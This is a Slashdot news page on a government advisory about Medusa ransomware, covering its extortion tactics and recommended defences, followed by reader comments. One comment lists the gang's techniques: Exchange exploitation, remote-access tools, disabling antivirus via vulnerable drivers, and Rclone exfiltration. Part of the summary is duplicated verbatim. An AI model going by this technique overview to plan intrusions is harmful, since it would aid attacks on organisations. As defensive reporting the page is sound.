Cybersecurity Alert Warns of 300 Attacks with 'Medusa' Ransomware (theregister.com) 18
A ransomware-as-a-service variant called "Medusa" has claimed over 300 victims in "critical infrastructure sectors" (including medical), according to an joint alert from CISA, the FBI, and the Multi-State Information Sharing Analysis Center.
And that alert reminds us that Medusa is a globe-spanning operation that recruits third-party affiliates to plant ransomware and negotiate with victims, notes the Register. "Even organizations that have good ransomware recovery regimes, meaning they don't need to unscramble encrypted data as they have good backups and fall-back plans, may consider paying to prevent the release of their stolen data, given the unpleasant consequences that follow information leaks. Medusa actors also set a deadline for victims to pay ransoms and provide a countdown timer that makes it plain when stolen info will be sprayed across the internet. If victims cough up $10,000 in cryptocurrency, the crims push the deadline forward by 24 hours.
The advisory reveals one Medusa actor has taken things a step further. "FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid," the advisory states. That separate actor then "requested half of the payment be made again to provide the 'true decryptor'," the advisory states, describing this incident as "potentially indicating a triple extortion scheme."
The security groups' advisory stresses that they "do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations..." (But "Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents...)
Besides updating software and operating systems, the alert makes these recommendations for organizations:
And that alert reminds us that Medusa is a globe-spanning operation that recruits third-party affiliates to plant ransomware and negotiate with victims, notes the Register. "Even organizations that have good ransomware recovery regimes, meaning they don't need to unscramble encrypted data as they have good backups and fall-back plans, may consider paying to prevent the release of their stolen data, given the unpleasant consequences that follow information leaks. Medusa actors also set a deadline for victims to pay ransoms and provide a countdown timer that makes it plain when stolen info will be sprayed across the internet. If victims cough up $10,000 in cryptocurrency, the crims push the deadline forward by 24 hours.
The advisory reveals one Medusa actor has taken things a step further. "FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid," the advisory states. That separate actor then "requested half of the payment be made again to provide the 'true decryptor'," the advisory states, describing this incident as "potentially indicating a triple extortion scheme."
The security groups' advisory stresses that they "do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations..." (But "Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents...)
Besides updating software and operating systems, the alert makes these recommendations for organizations:
- Require VPNs (or jump hosts) for remote network access
- Block remote access from unknown/untrusted origins, and disable unused ports
- Segment networks to help prevent the spread of ransomware
- Use a networking monitoring tool to spot and investigate abnormal activity — including lateral movement (using endpoint detection and response tools). Log all network traffic, and monitor it for unauthorized scanning and access attempts.
- Create recovery plans with encrypted offline backups of sensitive/proprietary data and servers
- Require multifactor authentication, use strong (and long) passwords, and "consider not requiring frequently recurring password changes, as these can weaken security." (Also audit access control following the principle of least privilege, and watch for new and/or unrecognized accounts.)
- Disable command-line and scripting activities and permissions.
Re: (Score:2)
MICROS~1 Windows strikes again ..
[babelphish] "Hey everyone! I have an unsubstantiated, FUD, point to grind like a fork in a garbage disposal! Look at me! I'm completely ignorant of system security but, boy!, do I feel like I'm contributing!" [babelphish]
Is this related to the Outlook attacks? (Score:2)
Parent vacuous and not constructive.
However the story makes me wonder if it is related to a recent submission of mine that Slashdot didn't care for... There were actually two parts of it, but the bits that seems relevant to this story are the "abnormal activity" and "access attempts" that I commented on in that submission.
But let's start with the quiz to see if it's personally relevant to you. If you have a Microsoft account, then this applies to you. Even if you don't want that account... If you scrounge a
The solution to ransomware in 3 words... (Score:3)
Re: (Score:2)
Re: (Score:2)
End users (Score:2)
Those "recommendations" are primarily aimed at the mouth-breathing end users who will engage with pretty much any piece of digital garbage in the mistaken belief that they're awesome and fark personal responsibility
Until we're allowed to fire these chuckledinks, this state of affairs will persist.
Re: End users (Score:3)
Violence... (Score:2)
...may not always be the solution but some of these scammers could probably benefit from an epic ass whoopin.
Would love to see a video where these bastards get raided by the cops AND their mothers with belts/chanclas/paddles in hand.
Re: (Score:2)
We need to send a beekeeper after them.
Re: (Score:2)
This sounds like the rant of someone bitten by ransomware.
Yes, politics here, sue me! (Score:1, Insightful)
DOGE probably fucked cybersecurity investigations team also.
Their solution is ban Linux? (Score:2)
Disable command-line and scripting activities and permissions.
Wait.. .What?
Re: (Score:2)
They target windows machines. Makes sense to deactivate scripting in machines used by the corporate Excel drones.
Attack chains mounted by the ransomware syndicate involve the exploitation of known security flaws in public-facing applications, mainly Microsoft Exchange Server, to obtain initial access.
Once gaining a successful foothold, the hackers drop use remote management and monitoring (RMM) software such as SimpleHelp, AnyDesk, or MeshAgent for persistent access, and employ the tried-and-tested Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes using KillAV.
Some of the other tools deployed over the course of a Medusa ransomware attack include Navicat to access and run database queries, RoboCopy, and Rclone for data exfiltration
https://thehackernews.com/2025... [thehackernews.com]
Re: (Score:2)
Mod parent up and I am also interested in doing this...
Re: (Score:2)
Quite a bit of the new malware will find systems with ssh keys and then use those to probe other systems and hop around. Sshd can be configured to require a key AND a system password which defeats the current round of these attacks.
Re: (Score:2)
Quite a bit of the new malware will find systems with ssh keys and then use those to probe other systems
That would be an example of why long-lived SSH keys should NEVER be stored without a strong passphrase, use a password manager, FIDO2 security key ecdsa-sk or ed25519-sk (ssh-keygen -t ed25519-sk -O resident -O verify-required),
and any automations should use short-lived OpenSSH certificates.